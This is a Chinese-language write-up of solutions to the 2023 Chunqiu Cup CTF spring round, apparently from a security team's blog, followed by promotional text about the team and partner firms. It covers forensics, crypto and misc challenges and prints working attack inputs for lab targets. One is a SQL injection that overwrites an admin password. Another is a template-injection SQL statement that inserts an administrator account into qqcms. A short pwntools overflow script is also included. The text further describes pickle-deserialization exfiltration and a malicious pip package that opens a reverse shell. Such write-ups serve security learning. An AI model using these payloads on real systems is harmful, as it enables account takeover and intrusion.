2023年春秋杯–网络安全联赛春季赛部分WP

WriteUp 1年前 (2023) admin
652 0 0

  

2023年春秋杯--网络安全联赛春季赛部分WP

        为积极响应国家网络空间安全人才战略,加快攻防兼备创新人才培养步伐,实现以赛促学、以赛促教、以赛促用,推动网络空间安全人才培养和产学研用生态发展。通过竞赛的形式,让大学生在模拟的网络环境中进行攻防演练,学习如何发现和利用漏洞,如何防范和应对攻击,提高自身的安全防护能力。其次,竞赛也促进高校信息安全教育的发展,推动信息安全教育的普及和深入。此外,竞赛还通过选拔机制,发掘和培养优秀的信息安全人才,为信息安全行业的发展注入新的活力。最后,竞赛也促进信息安全领域的交流和合作,推动信息安全技术的创新和发展。



Phpstudy



本来以为是XSS+CSRF反弹shell,但是一直弹不上,猜测是登陆界面sql注入放入X-Requested-With:XMLHttpRequest请头就能进入登陆界面用户名sadmin’;UPDATE ADMINS set PASSWORD =’c26be8aaf53b15054896983b43eb6a65′;–admin/123456

2023年春秋杯--网络安全联赛春季赛部分WP


计划任务执行cat /f*

2023年春秋杯--网络安全联赛春季赛部分WP





Easypy



2023年春秋杯--网络安全联赛春季赛部分WP


Dir扫目录,有个download路由,下载源码


2023年春秋杯--网络安全联赛春季赛部分WP


被删了,有个pyc反编译一下得到源码

2023年春秋杯--网络安全联赛春季赛部分WP

2023年春秋杯--网络安全联赛春季赛部分WP


过滤了R,sh,bash,利用点是resp = numpy.loads(numpydata)

Pickle反序列化,手搓opcode

过滤了上面这些字符,所以直接先将执行的内容存到文件里,利用vps外带

Exp如下

2023年春秋杯--网络安全联赛春季赛部分WP

2023年春秋杯--网络安全联赛春季赛部分WP


传参base64编码后的内容,监听即可得到flag

2023年春秋杯--网络安全联赛春季赛部分WP




Phpstudy



导出http:

2023年春秋杯--网络安全联赛春季赛部分WP


2023年春秋杯--网络安全联赛春季赛部分WP



改为压缩包得到:



2023年春秋杯--网络安全联赛春季赛部分WP


取证大师加载一下发现BitLocker解密:


2023年春秋杯--网络安全联赛春季赛部分WP

根据提示找到

tcp.srcport == 20 && tcp.dstport == 80

2023年春秋杯--网络安全联赛春季赛部分WP


2023年春秋杯--网络安全联赛春季赛部分WP


2023年春秋杯--网络安全联赛春季赛部分WP


提取出来得到:

bi-locker:120483-350966-299189-055297-225478-133463-431684-359403

解密得:

2023年春秋杯--网络安全联赛春季赛部分WP
2023年春秋杯--网络安全联赛春季赛部分WP


2023年春秋杯--网络安全联赛春季赛部分WP


有好多图片,取证大师试用无法一次性全部提取,发现有一个图片很大,提取出来

2023年春秋杯--网络安全联赛春季赛部分WP


2023年春秋杯--网络安全联赛春季赛部分WP
2023年春秋杯--网络安全联赛春季赛部分WP


Foremost一下:

2023年春秋杯--网络安全联赛春季赛部分WP


2023年春秋杯--网络安全联赛春季赛部分WP


使用magick montage拼接一下:

2023年春秋杯--网络安全联赛春季赛部分WP


猜测是password:856a-a56b6a705653


2023年春秋杯--网络安全联赛春季赛部分WP


flag2:-919c-a140d7054ac5

使用AXIOM Process挂载一下:


2023年春秋杯--网络安全联赛春季赛部分WP


Flag1:f97d5b05-d312-46ac


拼接一下

flag{f97d5b05-d312-46ac-919c-a140d7054ac5}





盲人会藏在哪里



2023年春秋杯--网络安全联赛春季赛部分WP
2023年春秋杯--网络安全联赛春季赛部分WP


加一下文件头得到密码


2023年春秋杯--网络安全联赛春季赛部分WP


ChunJiSai7k7kbibi@!

得到坤坤:

2023年春秋杯--网络安全联赛春季赛部分WP


Zsteg查看一下:


2023年春秋杯--网络安全联赛春季赛部分WP


发现了个ag{,提取一下看看



2023年春秋杯--网络安全联赛春季赛部分WP


flag{2c8ba897-0205-9bff-123d-281d12a24c38}





p2048



from pwn import *


p = remote(‘39.106.65.236’, 29728)


p.sendline(b’t’*0x400)


p.interactive()

玩几次就会溢出偏移到后门函数


2023年春秋杯--网络安全联赛春季赛部分WP


flag{3834fe18-932d-4b34-9427-57565f0a803c}




piphack



上传恶意python包

2023年春秋杯--网络安全联赛春季赛部分WP



压缩之后改成png格式,然后h->H绕过过滤,监听端口pip传该地址,下载这个png

反弹到shell得到flag


2023年春秋杯--网络安全联赛春季赛部分WP


flag{4661747e-c7ed-4d2e-a2ee-315243be16a8}




checkin



第一部分求解一下pell函数得到x,y

2023年春秋杯--网络安全联赛春季赛部分WP


直接使用二项式展开定理即可还原flag

2023年春秋杯--网络安全联赛春季赛部分WP

2023年春秋杯--网络安全联赛春季赛部分WP





backdoor



可以直接将z表示出来然后就能求解key了

2023年春秋杯--网络安全联赛春季赛部分WP

2023年春秋杯--网络安全联赛春季赛部分WP






ezrust



2023年春秋杯--网络安全联赛春季赛部分WP


审计猜测当前目录就是work



2023年春秋杯--网络安全联赛春季赛部分WP


所以./得到flag





qqcms



代码审计,找到后台路由是/index/admin

有历史漏洞,直接SQL注入改密码{{loop sql=‘INSERT INTO qc_user VALUES (666, 16666666666, “管理员”, “”,

“e10adc3949ba59abbe56e057f20f883e”, “”, “”, 1, “”, 2, 0.00, 0, 1, 1652334396, “127.0.0.1”, 1, 1, 1, 1652334410,

“127.0.0.1”)’}}{{/loop}}

登陆后台后发现文件包含漏洞

得到flag

2023年春秋杯--网络安全联赛春季赛部分WP





BWBA



Exp如下

2023年春秋杯--网络安全联赛春季赛部分WP

2023年春秋杯--网络安全联赛春季赛部分WP





Poisoned_tea_CHELL



exp如下

2023年春秋杯--网络安全联赛春季赛部分WP

2023年春秋杯--网络安全联赛春季赛部分WP

#flag{cdfec405-3f4b-457e-92fe-f6446098ee2e}




天权信安网络安全团队

网络无边 安全有界

2023年春秋杯--网络安全联赛春季赛部分WP
2022,感恩有您
2023,携手同行

 用技术撬动未来,用奋斗描绘成功!


        天权信安网络安全团队(简称“天权信安”),成立于2022年,是一支研究红蓝对抗、内网渗透、红队武器库、CTF竞赛及其网安相关活动的安全团队。这里聚集着一群有技术有担当有理想、热爱信安奉献信安的多方面专业人才。天权信安的“天权”来源于北斗七星,又称为文曲星,它代表着天资聪颖,能力超群,也象征着天权信安的高标准、高水平与高质量,体现着我们的宗旨–打造一支作风优良、实力强劲、团结协作的精英团队,用技术与毅力共同守护网络安全。目前成员 40 余人,队员分布于科大、航空大、武大、华科、西工大、西电、警大、江苏海洋大学、国际关系学院、广大、河北师大、吉林师大、西南石油、安工院、湖工大、华师大等国内各大高校,也分布于绿盟科技、奇安信、长亭科技、安恒信息、联通、移动等国内大厂。为“网络安全爱好者”提供一个更好的学习交流生态圈,天权信安欢迎技术大咖、CTF选手等资深专业人士前来分享网络安全前沿技术、攻防实战经验、内网渗透、IOT安全、电子取证、CTF、工控安全等技术,通过经验分享,来帮助大家了解最新网络安全动态,提升安全技术水平,拓宽知识领域,致力于打造一个开放共享的网络安全生态圈。

2023年春秋杯--网络安全联赛春季赛部分WP

2023年春秋杯--网络安全联赛春季赛部分WP

最新动态

网络无边 安全有界

2023年春秋杯--网络安全联赛春季赛部分WP
2022,感恩有您
2023,携手同行

 凌泽网安


        凌泽网安是一家本土专业的网络安全公司。基于核心实验室团队深厚的攻防技术基因及靶场建设能力,秉承着“ 止错于靶场之内,安网于事故之前,构筑检验性安全体系” 的使命,致力于打国内最具实战的靶场平台以及提供最专业的网络安全服务。主营产品包括网络安全靶场建设、网络安全培训、网络安全赛事服务、网络安全实验室建设、攻防演练等。

2023年春秋杯--网络安全联赛春季赛部分WP

SaaS在线教育平台

2023年春秋杯--网络安全联赛春季赛部分WP

攻防演练靶场

        公司成员均来自国内顶级安全团队人员和诸多知名战队,致力于构建网络安全人才培养体系。先后举办了一系列具有业内影响力的网络安全赛事及演练活动,研制了具备国内领先水平的可视化城市靶场平台和可支持多种赛制的赛事演练平台。

2023年春秋杯--网络安全联赛春季赛部分WP

网络靶场

        凌泽网安将采用“竞赛+科研创新+人才培养+服务+实战产品=网络安全”的“三位一体”人才培养模式,旨在培养复合型、创新型和应用型网络安全人才,以解决网络安全人才缺口。公司将把“人才强队”作为地勘经济发展的基本战略,重视人才的引进和培养,树立以人为本的科学人才观。公司将从战略和全局的高度,深刻认识人才在地勘经济发展中的关键性、基础性和决定性作用,把人才工作纳入单位总体工作之中,把人才强队战略作为加快地勘事业发展的基本战略。公司将优先招收主专业的人才,同时每年预留少量岗位用于特殊人才专项预留,以保持人才的层次性和多样性。

2023年春秋杯--网络安全联赛春季赛部分WP

CTF竞赛平台

 楚泽实验室介绍


        2023年4月正式将天权信安网络安全团队并入武汉楚泽实验室,楚泽实验室(Chuze Laboratory)是专注于靶场、网络与信息安全技术研究与创新工作的实验室,由来自全国名校热爱CTF和网络攻防的知名战队成员组成。实验室基于网络安全竞赛相关服务(包括技术平台提供、场景开发、技术支撑、培训、赛事运维等)、漏洞挖掘与利用、新型红蓝对抗、红队渗透攻击、安全产品运维等领域推出技术顶级服务。

2023年春秋杯--网络安全联赛春季赛部分WP

实训平台

        实验室以“ 锐意创新,与时俱进” 为宗旨,以“止错于靶场之内,安网于事故之前,构筑检验性安全体系”为使命,成为国家级网络安全服务支撑单位。研发出新一代网络靶场产品,面向全国培养高水平的网络安全人才,提供实战攻防演练和网安人才培训所需的仿真实训平台。为包括为政府、公安、金融、高校、电力、能源、运营商、企业等行业提供全面专业性的支持与服务。致力于成为中国网络与信息安全自主方案提供商。

和多样性。

 AGCTF战队介绍


        安阳工学院信息安全实验室AGCTF战队成立于2016年隶属于计算机科学与信息工程学院,也是由凌泽网安与安工院共建的校内安全团队,信息安全学生团队依托信息安全实验室,以研究信息安全为主,用CTF竞赛来证明自己的实力,日常学习过程中注重实验员未来的发展鼓励实验员参加国家组织的各式安全活动。信息安全学生团队现有成员19名,CTF队伍四队(三人一队)大二学生九人、大三学生三人。团队在最近的国家级赛事中排名均在五十名左右,2019获得省级以上奖励三次,2020年获得省级以上奖励四次。实验室现有证书23张,其中国家级证书7张省级证书16张。2020年我校安全团队三名大二的成员受邀请参与

某单位护网行动,均得到邀请方的赞扬及工作认可。

2023年春秋杯--网络安全联赛春季赛部分WP

2023年春秋杯--网络安全联赛春季赛部分WP






     往期回顾    


2023年春秋杯--网络安全联赛春季赛部分WP2023年春秋杯--网络安全联赛春季赛部分WP2023年春秋杯--网络安全联赛春季赛部分WP

原文始发于微信公众号(天权信安):2023年春秋杯–网络安全联赛春季赛部分WP

版权声明:admin 发表于 2023年6月1日 上午9:01。
转载请注明:2023年春秋杯–网络安全联赛春季赛部分WP | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...